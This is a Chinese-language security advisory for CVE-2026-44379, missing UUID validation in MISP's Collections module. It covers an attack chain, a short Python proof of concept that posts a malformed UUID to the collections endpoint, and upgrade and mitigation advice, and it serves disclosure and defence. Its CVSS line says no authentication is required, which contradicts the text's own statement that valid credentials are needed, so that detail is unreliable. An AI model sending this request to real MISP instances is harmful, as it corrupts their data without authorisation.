IPBUF安全漏洞报告
English
CVE-2026-44379 CVSS 5.3 中危

CVE-2026-44379 MISP UUID验证缺失漏洞

披露日期: 2026-05-13

漏洞信息

漏洞编号
CVE-2026-44379
漏洞类型
输入验证错误
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
MISP

相关标签

输入验证MISP完整性CVE-2026-44379

漏洞概述

MISP开源威胁情报共享平台在2.5.37版本前存在安全漏洞。其Collections模块未对uuid字段强制执行RFC 4122 UUID验证。具备权限的用户可提交畸形UUID值,导致数据完整性受损或后续代码逻辑出现异常行为。该问题已在2.5.37版本中修复,建议受影响用户尽快升级。

技术细节

该漏洞的根本原因在于MISP的Collections组件在处理数据时,未对输入字段`uuid`实施严格的RFC 4122格式校验。正常情况下,UUID应遵循特定结构,但受影响版本的后端代码缺失此验证逻辑。攻击者若具备创建或修改Collection记录的权限,即可构造并提交不符合规范的畸形UUID字符串。当系统后续处理这些包含畸形UUID的记录时,由于相关代码路径默认UUID为有效标识符,这种异常数据可能触发数据库完整性约束冲突、索引错误或关联查询失败,进而破坏系统数据完整性,导致业务逻辑出现异常或不可预期的行为。

攻击链分析

STEP 1
侦察
攻击者识别目标MISP实例,并确认其版本低于2.5.37。
STEP 2
获取权限
攻击者获取能够创建或修改Collection记录的合法用户凭证(如API密钥或Web会话)。
STEP 3
漏洞利用
攻击者向MISP发送构造的HTTP请求,在Collection的uuid字段中填入不符合RFC 4122规范的畸形数据。
STEP 4
影响达成
系统接受并存储了畸形UUID,导致后续依赖UUID的数据处理逻辑出错,破坏系统数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (example) target_url = "https://misp-instance.com/collections/add" # Malformed UUID that does not comply with RFC 4122 malformed_payload = { "name": "Test Collection", "uuid": "invalid-uuid-string-12345", "description": "PoC for CVE-2026-44379" } # Authorization header (requires valid API key or session) headers = { "Authorization": "Bearer YOUR_API_KEY", "Content-Type": "application/json" } try: response = requests.post(target_url, json=malformed_payload, headers=headers, verify=False) if response.status_code == 200: print("[+] Potential exploitation successful: Malformed UUID accepted.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

MISP < 2.5.37

防御指南

临时缓解措施
建议管理员立即将MISP平台升级至2.5.37或更高版本。如果无法立即升级,应在应用边界(如反向代理或API网关)配置规则,拦截向Collections接口提交的非标准UUID格式请求,确保uuid字段严格符合RFC 4122规范。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表